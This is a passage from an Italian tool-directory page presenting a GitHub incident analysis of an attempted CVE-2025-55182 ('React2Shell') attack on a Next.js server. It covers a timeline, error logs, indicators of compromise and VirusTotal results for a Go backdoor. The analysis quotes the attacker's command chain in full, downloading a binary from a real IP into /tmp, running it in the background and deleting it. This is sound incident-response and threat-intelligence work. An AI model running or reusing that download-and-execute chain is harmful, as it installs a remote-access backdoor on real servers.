Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
Gestione degli Indicatori di Compromissione (IOC)Analisi delle VulnerabilitàInformatica ForenseSicurezza WebAnalisi MalwareThreat IntelligenceApprendimento e FormazioneRisposta agli Incidenti

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

Analisi di attacchi reali di CVE-2025-55182 (React2Shell) - Vulnerabilità RCE nei React Server Components

Vedi Repository
169 mesi faNon ancora revisionato
Condividi

CVE-2025-55182 Analisi dell'Attacco: RCE nei React Server Components

Analisi di un attacco reale su un'applicazione Next.js in produzione

📋 Indice

  • Sommario Esecutivo
  • Panoramica della Vulnerabilità
  • Cronologia dell'Attacco
  • Analisi Tecnica
  • Analisi del Malware
  • Indicatori di Compromissione (IOC)
  • Mitigazione e Risposta
  • Lezioni Apprese
  • Riferimenti

Sommario Esecutivo

Il 5 dicembre 2025, la nostra applicazione Next.js in produzione è stata presa di mira da aggressori che sfruttavano CVE-2025-55182 (React2Shell), una vulnerabilità critica di Remote Code Execution nei React Server Components. L'attacco ha tentato di scaricare ed eseguire un trojan backdoor Linux sul nostro server.

AttributoValore
ID CVECVE-2025-55182
Punteggio CVSS9.8 (Critico)
Data dell'Attacco5 dicembre 2025
Esito dell'Attacco✅ Bloccato (post-patch)
Tipo di MalwareTrojan Backdoor Linux
Stack CoinvoltoNext.js + React Server Components

Panoramica della Vulnerabilità

Cos'è CVE-2025-55182?

CVE-2025-55182, nota anche come "React2Shell", è una vulnerabilità critica di Remote Code Execution (RCE) che colpisce i React Server Components (RSC) in:

  • React: versioni 19.0.0 - 19.2.1
  • Next.js: versioni 15.x e 16.x (prima delle patch)

Causa Principale

La vulnerabilità risiede nella funzione renderToReadableStream() all'interno del Flight Server di React. Quando elabora payload RSC appositamente predisposti, il server non riesce a sanificare correttamente determinati input, portando all'esecuzione arbitraria di codice.

Vettore d'Attacco

Attaccante → Payload RSC malevolo → Flight Server → eval() → RCE

L'attaccante invia una richiesta POST costruita con un payload serializzato malevolo che viene deserializzato ed eseguito sul server.


Cronologia dell'Attacco

Fase 1: Tentativi Iniziali di Sfruttamento (Pre-Patch)

Timestamp (UTC)Evento
5 dic, 06:20Primo attacco rilevato tramite Sentry
5 dic, 06:20Il payload tenta di eseguire comandi shell
5 dic, 06:20Attacco parzialmente riuscito (pre-patch)

Log Errore Sentry (Pre-Patch):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

Fase 2: Distribuzione della Patch

TimestampAzione
4 dic, 14:13Aggiornato a Next.js 16.0.7
4 dic, 14:13Distribuita versione con patch (v1.0.0-beta-4)

Fase 3: Attacco Bloccato Post-Patch

Timestamp (UTC)Evento
5 dic, 08:48Tentativo di attacco rilevato
5 dic, 08:48Esecuzione del payload BLOCCATA
5 dic, 08:48Errore: syntax error: unexpected ";"

Log Errore Sentry (Post-Patch):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

La patch ha impedito con successo l'esecuzione del comando malevolo.


Analisi Tecnica

Dettagli della Richiesta di Attacco

AttributoValore
URL di Destinazionehttps://[REDATTO]/
MetodoPOST
User-AgentPython Requests 2.31
OrigineScript di attacco automatizzato

Analisi del Payload

L'attaccante ha tentato di eseguire la seguente catena di comandi:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

Scomposizione:

PassoComandoScopo
1wget http://45.76.155.14/vim -O /tmp/vimScaricare il malware
2chmod +x /tmp/vimRenderlo eseguibile
3nohup /tmp/vim > /dev/null 2>&1 &Eseguire in background, persistenza dopo il logout
4rm -f /tmp/vimEliminare le prove

Ambiente del Server

ComponenteVersione
SOAlpine Linux 3.23.0
RuntimeNode.js v20.19.6
FrameworkNext.js 16.0.7 (con patch)
ContenitoreDocker

Analisi del Malware

Informazioni sul File

AttributoValore
Nome Filevim (mascherato da strumento legittimo)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
Tipo FileELF 64-bit LSB eseguibile, x86-64
LinguaggioGo (binario compilato)
Dimensione File~4.7 MB

Risultati VirusTotal

Tasso di Rilevamento: 13/72 (18%)

VendorNome Rilevamento
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

Link VirusTotal: Visualizza Analisi

Analisi del Binario

Intestazione ELF:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

Capacità Identificate:

CapacitàEvidenza
Client HTTP/HTTPSnet/http, *http.Client
Crittografia TLScrypto/tls, crypto/aes
Proxy SOCKS5socks, socks5
Risoluzione DNSnet/dns/dnsmessage
Crittografia Fortechacha20poly1305, Ed25519

Stringhe Estratte (Rilevanti):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

Regole IDS Attivate

SeveritàRegolaFonte
BASSAET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
BASSAET DNS Query for .cc TLDProofpoint ET Open

Classificazione del Malware

Tipo: Trojan Backdoor Linux

Capacità:

  • Accesso remoto alla shell
  • Comunicazione Command & Control (C2)
  • Upload/download di file
  • Comunicazioni crittografate
  • Tunneling del traffico tramite SOCKS5
  • Meccanismi di persistenza

Indicatori di Compromissione (IOC)

IOC di Rete

TipoValoreDescrizione
Indirizzo IP45.76.155.14Server di distribuzione malware
URLhttp://45.76.155.14/vimURL di download malware
HostingVultr VPSProvider cloud
TLD.ccDominio C2 utilizza TLD .cc

IOC File

TipoValore
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[Calcolare se necessario]
MD5[Calcolare se necessario]
Nome Filevim (mascherato)
Tipo FileELF 64-bit x86-64
Dimensione File~4.7 MB

IOC Comportamentali

IndicatoreDescrizione
wget verso IP esternoDownload da URL non standard
File in /tmp/Eseguibile sospetto nella directory temporanea
nohup + esecuzione in backgroundTentativo di persistenza
Cancellazione immediata del filePulizia delle prove
User-Agent Python RequestsStrumento di attacco automatizzato

Regola YARA

Scarica lo strumento